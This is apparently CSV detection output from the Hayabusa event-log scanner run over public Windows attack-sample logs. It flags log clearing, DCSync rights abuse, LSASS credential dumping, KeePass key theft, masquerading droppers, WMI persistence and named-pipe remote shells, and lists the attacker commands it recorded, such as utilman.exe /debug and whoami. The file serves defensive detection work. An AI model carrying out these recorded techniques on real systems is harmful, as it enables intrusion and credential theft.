08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx -2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx -2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx -2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx -2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 